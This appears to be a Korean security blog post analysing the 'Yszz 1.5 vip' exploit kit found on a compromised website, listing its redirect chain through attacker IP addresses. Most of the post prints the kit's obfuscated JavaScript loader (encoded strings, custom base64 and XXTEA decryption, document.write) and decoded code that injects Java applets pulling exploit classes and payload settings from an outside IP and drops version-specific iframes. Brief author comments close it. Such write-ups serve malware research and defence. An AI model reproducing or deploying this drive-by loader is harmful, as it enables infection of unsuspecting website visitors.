본문 바로가기

security/악성코드 유포

Yszz 1.5 vip !

발견지 : http://www.icross.co.kr/

            →http://festival.cocobau.com/adm_site/e_show/e_th_ad.js

               →http://205.164.25.146/pic/img.js

               →http://205.164.25.146/pic/img.html (Yszz 1.5 vip)

                   → http://205.164.25.146/pic/swfobject.js

                   → http://205.164.25.146/pic/jpg.js

               →http://205.164.25.146/pic/css.html



var K4Er = "%";

var MDIxo=K4Er+"78"+K4Er+"6F";

var OIai8=K4Er+"78"+K4Er+"6F"+K4Er+"31";

var HHYWv=K4Er+"31"+"%59"+"%53";

var CvXWz="%7A"+"%7A"+"%31";

var JZyjl="%31"+"%6F"+"%78";

var ERb7H="%6F"+"%78";

var XGpwn2 =중략/

oI0Nl6jI2jrBT1pk+oIDWqCs=",HUx2Ydz="%64"+"

%6f"+"%63"+"%75"+"%6d"+"%65"+"%6e"+"%74",

sac5pxhFS="%77"+"%72"+"%69"+"%74"+"%65",ubo8KLEZHIPX2;

var kxin1s = "%53"+"%74"+"%72";

var B83pNx = kxin1s+"%69"+"%6e"+"%67";

var kxin2s = "%66"+"%72"+"%6f";

var kxin3s = "%6d"+"%43"+"%68";

var kxin4s = "%61"+"%72"+"%43";

var kxin5s = "%6f"+"%64"+"%65";

var WjuQFO = kxin2s+kxin3s+kxin4s+kxin5s;

var fxTmFiR = AVgHbu2f(B83pNx);

var xZW9RVt = AVgHbu2f(WjuQFO);

var sATWUn = "%41"+"%72"+"%72"+"%61"+"%79";

var x83QqGV = AVgHbu2f(sATWUn);

var SnDN8 = "%73"+"%74"+"%72";

var Z0b9A = "%63"+"%68"+"%61"+"%72"+"%43"+"%6f"+"%64"+"%65"+"%41"+"%74";

var fkPj5 = AVgHbu2f(SnDN8);

var hyYQ8 = AVgHbu2f(Z0b9A);

function tzWmUni(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=fkPj5[hyYQ8](i++);switch(c>>4)

{case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=fkPj5[hyYQ8](i++);out[out.length]=window[fxTmFiR][xZW9RVt](((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=fkPj5[hyYQ8](i++);char3=fkPj5[hyYQ8](i++);out[out.length]=window[fxTmFiR][xZW9RVt](((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}}

return out.join('');}

var ZjykejU6Chars=new window[x83QqGV](-1,-1,-1,-중략--1,-1,-1);

HUx2Ydz=AVgHbu2f(HUx2Ydz);

function ZjykejU6(str)

{var YS1,YS2,YS3,YS4;/*Yszz 1.5 vip*/var i,len,out;

len=str.length;i=0;out = "";

while(i<len)

{do{YS1=ZjykejU6Chars[str.charCodeAt(i++)&0xff]}while(i<len&&YS1==-1);

if(YS1==-1)

break;do{YS2=ZjykejU6Chars[str.charCodeAt(i++)&0xff]}while(i<len&&YS2==-1);

if(YS2==-1)

break;out+=window[fxTmFiR][xZW9RVt]((YS1<<2)|((YS2&0x30)>>4));

do{YS3=str.charCodeAt(i++)&0xff;if(YS3==61)

return out;

YS3=ZjykejU6Chars[YS3]}while(i<len&&YS3==-1);

if(YS3==-1)

break;out+=window[fxTmFiR][xZW9RVt](((YS2&0XF)<<4)|((YS3&0x3C)>>2));

do{YS4=str.charCodeAt(i++)&0xff;if(YS4==61)

return out;YS4=ZjykejU6Chars[YS4]}while(i<len&&YS4==-1);if(YS4==-1)

break;out+=window[fxTmFiR][xZW9RVt](((YS3&0x03)<<6)|YS4)}

return out}

function long2str(v,w){var vl=v.length;var sl=v[vl-1]&0xffffffff;for(var i=0;i<vl;i++)

{v[i]=window[fxTmFiR][xZW9RVt](v[i]&0xff,v[i]>>>8&0xff,v[i]>>>16&0xff,v[i]>>>24&0xff);}

if(w){return v.join('').substring(0,sl);}

else{return v.join('');}}

function str2long(s,w){var len=s.length;var v=[];for(var i=0;i<len;i+=4)

{v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24;}

if(w){v[v.length]=len;}

return v;}

ubo8KLEZHIPX2=AVgHbu2f(XGpwn2);

function kaixin(str,Udkz){if(str==""){return"";}

var v=str2long(str,false);var k=str2long(Udkz,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff;}

z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}

return long2str(v,true);}

sac5pxhFS=AVgHbu2f(sac5pxhFS);

JS0W=Cn6T4bG0znIi;

JS0W=tzWmUni(kaixin(ZjykejU6(JS0W), ubo8KLEZHIPX2));

window[HUx2Ydz][sac5pxhFS](JS0W);


[생략]


   {

     var kaixin=document.createElement('applet');

     kaixin.width="1";

     kaixin.height="1";

     if((kaixinm<=16027 && kaixinm>=16000) || (kaixinm>=15000 && kaixinm<=15031))

     {

       kaixin.archive="6UXSEJgm.jpg";

       kaixin.code="GondadGondadExp.class";

       kaixin.setAttribute("dota","http://69.46.87.99/img/jpg.css");

       document.body.appendChild(kaixin);

     }

     else if ((kaixinm<=17003 && kaixinm>=17000) || (kaixinm<=16032 && kaixinm>=16000) ||(kaixinm>=15035 && kaixinm<=15000))

     {

       kaixin.archive="pvoszTc.jpg";

       kaixin.code="gond1723.Gondattack.class";

       kaixin.setAttribute("xiaomaolv","http://69.46.87.99/img/jpg.css");

       kaixin.setAttribute("bn","woyouyizhixiaomaolv");

       kaixin.setAttribute("si","conglaiyebuqi");

       kaixin.setAttribute("bs","748");

       document.body.appendChild(kaixin);

     }

     else

     {

       var ques3 = window.navigator.userAgent.toLowerCase();

       if (ques3.indexOf("msie 6") > -1)

       {

         ...cument.write("<OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' width='200' height='200'><param name=xiaomaolv value= 'http://69.46.87.99/img/jpg.css'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'cve2012xxxx.Gondvv.class'><param name=archive value= 'DB6Jm.jpg'></OBJECT>");

       }

       else

       {

         생략


         kaixiny.archive = "DB6Jm.jpg";

         kaixiny.code = "cve2012xxxx.Gondvv.class";

         kaixiny.setAttribute("xiaomaolv", "http://69.46.87.99/img/jpg.css");

         kaixiny.setAttribute("bn", "woyouyizhixiaomaolv");

         kaixiny.setAttribute("si", "conglaiyebuqi");

         kaixiny.setAttribute("bs", "748");

         document.body.appendChild(kaixiny);

         

       }

       

     }

     

   }

   else

   {

     var pcss=navigator.userAgent.toLowerCase();

     var UaYcKzD2 = window.navigator.userAgent.toLowerCase();

     if ((UaYcKzD2.indexOf('msie 8.0') > -1))

     {

       document.writeln("<iframe src=T0HE3R.html><\/iframe>");

       

     }

     else if ((UaYcKzD2.indexOf('msie 6.0') > -1) || (UaYcKzD2.indexOf('msie 7.0') > -1))

     {

       document.writeln("<iframe src=6cxyl.html><\/iframe>");

       

     }

     

   }

   

 }


버전이 올라가면서 바뀌는 줄 알았는데 별달리 바뀐게 없는거 같이 느껴 졌다.

디코딩 했을때 역시 msie 버전 체크하는건 요새는 버전에 따라서 다시 연결되는게 대세인거 같다!

yszz 도 공다팩의 다동 처럼 어떤식으로 우회할지 조금 더 지켜봐야겠다!